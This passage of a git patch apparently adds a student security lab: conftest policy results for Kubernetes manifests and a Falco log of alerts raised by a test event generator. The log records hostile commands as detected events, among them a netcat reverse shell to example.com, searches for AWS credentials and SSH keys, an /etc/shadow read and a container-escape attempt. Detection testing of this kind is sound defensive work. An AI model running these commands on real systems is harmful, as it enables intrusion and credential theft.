From 497972355589c074d383c49bdc2412ec9b8f2170 Mon Sep 17 00:00:00 2001
From: scruffyscarf
Date: Mon, 27 Oct 2025 14:05:34 +0300
Subject: [PATCH] =?UTF-8?q?docs:=20add=20lab9=20=E2=80=94=20falco=20runtim?=
 =?UTF-8?q?e=20+=20conftest=20policies?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 labs/lab9/analysis/conftest-compose.txt | 1 +
 labs/lab9/analysis/conftest-hardened.txt | 1 +
 labs/lab9/analysis/conftest-unhardened.txt | 12 +++
 labs/lab9/falco/logs/falco.log | 32 +++++++
 labs/lab9/falco/rules/custom-rules.yaml | 11 +++
 labs/lab9/submission9.md | 101 +++++++++++++++++++++
 6 files changed, 158 insertions(+)
 create mode 100644 labs/lab9/analysis/conftest-compose.txt
 create mode 100644 labs/lab9/analysis/conftest-hardened.txt
 create mode 100644 labs/lab9/analysis/conftest-unhardened.txt
 create mode 100644 labs/lab9/falco/logs/falco.log
 create mode 100644 labs/lab9/falco/rules/custom-rules.yaml
 create mode 100644 labs/lab9/submission9.md
diff --git a/labs/lab9/analysis/conftest-compose.txt b/labs/lab9/analysis/conftest-compose.txt
new file mode 100644
index 00000000..d34477f0
--- /dev/null
+++ b/labs/lab9/analysis/conftest-compose.txt
@@ -0,0 +1 @@
+15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
\ No newline at end of file
diff --git a/labs/lab9/analysis/conftest-hardened.txt b/labs/lab9/analysis/conftest-hardened.txt
new file mode 100644
index 00000000..e1b772cc
--- /dev/null
+++ b/labs/lab9/analysis/conftest-hardened.txt
@@ -0,0 +1 @@
+30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
\ No newline at end of file
diff --git a/labs/lab9/analysis/conftest-unhardened.txt b/labs/lab9/analysis/conftest-unhardened.txt
new file mode 100644
index 00000000..8bfc3684
--- /dev/null
+++ b/labs/lab9/analysis/conftest-unhardened.txt
@@ -0,0 +1,12 @@
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define livenessProbe
+WARN - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" should define readinessProbe
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.limits.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.cpu
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" missing resources.requests.memory
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set allowPrivilegeEscalation: false
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set readOnlyRootFilesystem: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" must set runAsNonRoot: true
+FAIL - /project/manifests/k8s/juice-unhardened.yaml - k8s.security - container "juice" uses disallowed :latest tag
+
+30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
\ No newline at end of file
diff --git a/labs/lab9/falco/logs/falco.log b/labs/lab9/falco/logs/falco.log
new file mode 100644
index 00000000..9ec4a5f7
--- /dev/null
+++ b/labs/lab9/falco/logs/falco.log
@@ -0,0 +1,32 @@ +{"hostname":"8d5d68bba707","output":"2025-10-26T16:15:25.193767615+0000: Notice A shell was spawned in a container with an attached terminal | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=containerd-shim command=sh -lc echo hello-from-shell terminal=34816 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=4e8c9ece9d33 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"4e8c9ece9d33","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495325193767615,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -lc echo hello-from-shell","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"containerd-shim","proc.tty":34816,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Terminal shell in container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","shell"],"time":"2025-10-26T16:15:25.193767615Z"} +Events detected: 1 +Rule counts by severity: + NOTICE: 1 +Triggered rules by rule name: + Terminal shell in container: 1 +Events detected: 0 +Rule counts by severity: +Triggered rules by rule name: +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:05.246847774+0000: Warning Falco Custom: File write in /usr/local/bin (container=lab9-helper user=root file=/usr/local/bin/custom-rule.txt flags=O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER) container_id=4e8c9ece9d33 container_name=lab9-helper container_image_repository=alpine container_image_tag=3.19 k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"4e8c9ece9d33","container.image.repository":"alpine","container.image.tag":"3.19","container.name":"lab9-helper","evt.arg.flags":"O_LARGEFILE|O_TRUNC|O_CREAT|O_WRONLY|O_F_CREATED|FD_UPPER_LAYER","evt.time.iso8601":1761495485246847774,"fd.name":"/usr/local/bin/custom-rule.txt","k8s.ns.name":null,"k8s.pod.name":null,"user.name":"root"},"priority":"Warning","rule":"Write Binary Under UsrLocalBin","source":"syscall","tags":["compliance","container","drift"],"time":"2025-10-26T16:18:05.246847774Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:30.915703286+0000: Warning Symlinks created over sensitive files | target=/etc linkpath=/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link evt_type=symlinkat user=root user_uid=0 user_loginuid=-1 process=ln proc_exepath=/bin/busybox parent=event-generator command=ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.linkpath":"/tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link","evt.arg.target":"/etc","evt.time.iso8601":1761495510915703286,"evt.type":"symlinkat","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"ln -s /etc /tmp/falco-event-generator-syscall-CreateSymlinkOverSensitiveFiles-2389598008/etc_link","proc.exepath":"/bin/busybox","proc.name":"ln","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Create Symlink Over Sensitive 
Files","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:30.915703286Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.144445078+0000: Notice Shell spawned by untrusted binary | parent_exe=/tmp/falco-event-generator-syscall-spawned-3512629639/httpd parent_exepath=/bin/event-generator pcmdline=httpd --loglevel info run ^helper.RunShell$ gparent=event-generator ggparent=containerd-shim aname[4]=runc aname[5]=init aname[6]=init aname[7]= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=httpd command=sh -c ls > /dev/null terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511144445078,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"event-generator","proc.aname[3]":"containerd-shim","proc.aname[4]":"runc","proc.aname[5]":"init","proc.aname[6]":"init","proc.aname[7]":null,"proc.cmdline":"sh -c ls > /dev/null","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"httpd --loglevel info run ^helper.RunShell$","proc.pexe":"/tmp/falco-event-generator-syscall-spawned-3512629639/httpd","proc.pexepath":"/bin/event-generator","proc.pname":"httpd","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Run shell untrusted","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution","process","shell"],"time":"2025-10-26T16:18:31.144445078Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.250304203+0000: Warning Detected AWS 
credentials search activity | proc_pcmdline=event-generator run syscall proc_cwd=/ group_gid=0 group_name=root user_loginname= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname .aws/credentials terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511250304203,"evt.type":"execve","group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname .aws/credentials","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"find","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Find AWS Credentials","source":"syscall","tags":["T1552","aws","container","host","maturity_stable","mitre_credential_access","process"],"time":"2025-10-26T16:18:31.250304203Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.354000619+0000: Warning Bulk data has been removed from disk | file= evt_type=execve user=root user_uid=0 user_loginuid=-1 process=shred proc_exepath=/bin/busybox parent=event-generator command=shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-1037392393 terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511354000619,"evt.type":"execve","fd.name":null,"k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"shred -u /tmp/falco-event-generator-syscall-RemoveBulkDataFromDisk-1037392393","proc.exepath":"/bin/busybox","proc.name":"shred","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Remove Bulk Data from Disk","source":"syscall","tags":["T1485","container","filesystem","host","maturity_stable","mitre_impact","process"],"time":"2025-10-26T16:18:31.354000619Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.573044536+0000: Notice Packet socket was created in a container | socket_info=fd=6() domain=17(AF_PACKET) type=3 proto=3 connection= lport= rport= fd_type= fd_proto= evt_type=socket user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.args":"fd=6() domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1761495511573044536,"evt.type":"socket","fd.l4proto":"","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet 
socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2025-10-26T16:18:31.573044536Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.692720536+0000: Warning Grep private keys or passwords activities found | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=find proc_exepath=/bin/busybox parent=event-generator command=find /tmp -maxdepth 1 -iname id_rsa terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495511692720536,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"find /tmp -maxdepth 1 -iname id_rsa","proc.exepath":"/bin/busybox","proc.name":"find","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Search Private Keys or Passwords","source":"syscall","tags":["T1552.001","container","filesystem","host","maturity_stable","mitre_credential_access","process"],"time":"2025-10-26T16:18:31.692720536Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.794320161+0000: Warning Log files were tampered | file=/tmp/falco-event-generator-syscall-ClearLogActivities-3316563150/syslog evt_type=openat user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=containerd-shim command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495511794320161,"evt.type":"openat","fd.name":"/tmp/falco-event-generator-syscall-ClearLogActivities-3316563150/syslog","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Clear Log Activities","source":"syscall","tags":["NIST_800-53_AU-10","T1070","container","filesystem","host","maturity_stable","mitre_defense_evasion"],"time":"2025-10-26T16:18:31.794320161Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:31.896295578+0000: Notice Detected potential PTRACE_TRACEME anti-debug attempt | proc_pcmdline=event-generator run syscall evt_type=ptrace user=root user_uid=0 user_loginuid=-1 process=event-generator proc_exepath=/bin/event-generator parent=event-generator command=event-generator run syscall terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495511896295578,"evt.type":"ptrace","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"PTRACE anti-debug 
attempt","source":"syscall","tags":["T1622","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-10-26T16:18:31.896295578Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.028092498+0000: Warning Sensitive file opened for reading by trusted program after startup | file=/etc/shadow pcmdline=event-generator run syscall gparent=containerd-shim ggparent=runc gggparent=init evt_type=openat user=root user_uid=0 user_loginuid=-1 process=httpd proc_exepath=/bin/event-generator parent=event-generator command=httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495518028092498,"evt.type":"openat","fd.name":"/etc/shadow","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.aname[3]":"runc","proc.aname[4]":"init","proc.cmdline":"httpd --loglevel info run ^syscall.ReadSensitiveFileUntrusted$ --sleep 6s","proc.exepath":"/bin/event-generator","proc.name":"httpd","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Read sensitive file trusted after startup","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2025-10-26T16:18:38.028092498Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.133652581+0000: Warning Netcat runs inside container that allows remote code execution | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=nc proc_exepath=/usr/bin/nc parent=event-generator command=nc -e /bin/sh example.com 22 terminal=0 
exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495518133652581,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"nc -e /bin/sh example.com 22","proc.exepath":"/usr/bin/nc","proc.name":"nc","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Netcat Remote Code Execution in Container","source":"syscall","tags":["T1059","container","maturity_stable","mitre_execution","network","process"],"time":"2025-10-26T16:18:38.133652581Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.240851248+0000: Critical Detect an attempt to exploit a container escape using release_agent file | file=/release_agent cap_effective=CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE evt_type=openat user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c echo 'hello world' > release_agent terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator 
container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.time.iso8601":1761495518240851248,"evt.type":"openat","fd.name":"/release_agent","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c echo 'hello world' > release_agent","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pname":"event-generator","proc.tty":0,"thread.cap_effective":"CAP_CHOWN CAP_DAC_OVERRIDE CAP_DAC_READ_SEARCH CAP_FOWNER CAP_FSETID CAP_KILL CAP_SETGID CAP_SETUID CAP_SETPCAP CAP_LINUX_IMMUTABLE CAP_NET_BIND_SERVICE CAP_NET_BROADCAST CAP_NET_ADMIN CAP_NET_RAW CAP_IPC_LOCK CAP_IPC_OWNER CAP_SYS_MODULE CAP_SYS_RAWIO CAP_SYS_CHROOT CAP_SYS_PTRACE CAP_SYS_PACCT CAP_SYS_ADMIN CAP_SYS_BOOT CAP_SYS_NICE CAP_SYS_RESOURCE CAP_SYS_TIME CAP_SYS_TTY_CONFIG CAP_MKNOD CAP_LEASE CAP_AUDIT_WRITE CAP_AUDIT_CONTROL CAP_SETFCAP CAP_MAC_OVERRIDE CAP_MAC_ADMIN CAP_SYSLOG CAP_WAKE_ALARM CAP_BLOCK_SUSPEND CAP_AUDIT_READ CAP_PERFMON CAP_BPF CAP_CHECKPOINT_RESTORE","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Detect release_agent File Container Escapes","source":"syscall","tags":["T1611","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-10-26T16:18:38.240851248Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.439038498+0000: Critical Fileless execution via memfd_create | container_start_ts=1761495510680951565 proc_cwd=/ evt_res=SUCCESS proc_sname=event-generator gparent=containerd-shim evt_type=execve user=root user_uid=0 user_loginuid=-1 process=3 proc_exepath=memfd:program parent=event-generator command=3 run helper.DoNothing terminal=0 exe_flags=EXE_WRITABLE|EXE_FROM_MEMFD container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1761495510680951565,"evt.arg.flags":"EXE_WRITABLE|EXE_FROM_MEMFD","evt.res":"SUCCESS","evt.time.iso8601":1761495518439038498,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"3 run helper.DoNothing","proc.cwd":"/","proc.exepath":"memfd:program","proc.name":"3","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Fileless execution via memfd_create","source":"syscall","tags":["T1620","container","host","maturity_stable","mitre_defense_evasion","process"],"time":"2025-10-26T16:18:38.439038498Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.668691706+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1761495518668691706,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c 
/dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-10-26T16:18:38.668691706Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.669053123+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1761495518669053123,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-cIY2gi.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from 
/dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-10-26T16:18:38.669053123Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.778881790+0000: Warning Debugfs launched started in a privileged container | evt_type=execve user=root user_uid=0 user_loginuid=-1 process=debugfs proc_exepath=/usr/sbin/debugfs parent=event-generator command=debugfs -V terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.time.iso8601":1761495518778881790,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"debugfs -V","proc.exepath":"/usr/sbin/debugfs","proc.name":"debugfs","proc.pname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Debugfs Launched in Privileged Container","source":"syscall","tags":["T1611","cis","container","maturity_stable","mitre_privilege_escalation","process"],"time":"2025-10-26T16:18:38.778881790Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:38.888093665+0000: Critical Executing binary not part of base image | proc_exe=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF proc_sname=event-generator gparent=containerd-shim proc_exe_ino_ctime=1761495518884086012 proc_exe_ino_mtime=1761495518884086012 proc_exe_ino_ctime_duration_proc_start=3645153 proc_cwd=/ container_start_ts=1761495510680951565 evt_type=execve user=root user_uid=0 user_loginuid=-1 process=falco-event-gen proc_exepath=/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF parent=event-generator 
command=falco-event-gen terminal=0 exe_flags=EXE_WRITABLE|EXE_UPPER_LAYER container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"c57ba3de7462","container.image.repository":"falcosecurity/event-generator","container.image.tag":"latest","container.name":"eventgen","container.start_ts":1761495510680951565,"evt.arg.flags":"EXE_WRITABLE|EXE_UPPER_LAYER","evt.time.iso8601":1761495518888093665,"evt.type":"execve","k8s.ns.name":null,"k8s.pod.name":null,"proc.aname[2]":"containerd-shim","proc.cmdline":"falco-event-gen","proc.cwd":"/","proc.exe":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF","proc.exe_ino.ctime":1761495518884086012,"proc.exe_ino.ctime_duration_proc_start":3645153,"proc.exe_ino.mtime":1761495518884086012,"proc.exepath":"/bin/falco-event-generator-syscall-DropAndExecuteNewBinaryInContainer-t1xEcF","proc.name":"falco-event-gen","proc.pname":"event-generator","proc.sname":"event-generator","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Critical","rule":"Drop and execute new binary in container","source":"syscall","tags":["PCI_DSS_11.5.1","TA0003","container","maturity_stable","mitre_persistence","process"],"time":"2025-10-26T16:18:38.888093665Z"} +{"hostname":"8d5d68bba707","output":"2025-10-26T16:18:39.327861706+0000: Notice Disallowed SSH Connection | connection=172.17.0.5:47644->23.215.0.136:443 lport=443 rport=47644 fd_type=ipv4 fd_proto=tcp evt_type=connect user=root user_uid=0 user_loginuid=-1 process=ssh proc_exepath=/usr/bin/ssh parent=event-generator command=ssh user@example.com -p 443 terminal=0 container_id=c57ba3de7462 container_name=eventgen container_image_repository=falcosecurity/event-generator container_image_tag=latest k8s_pod_name= 
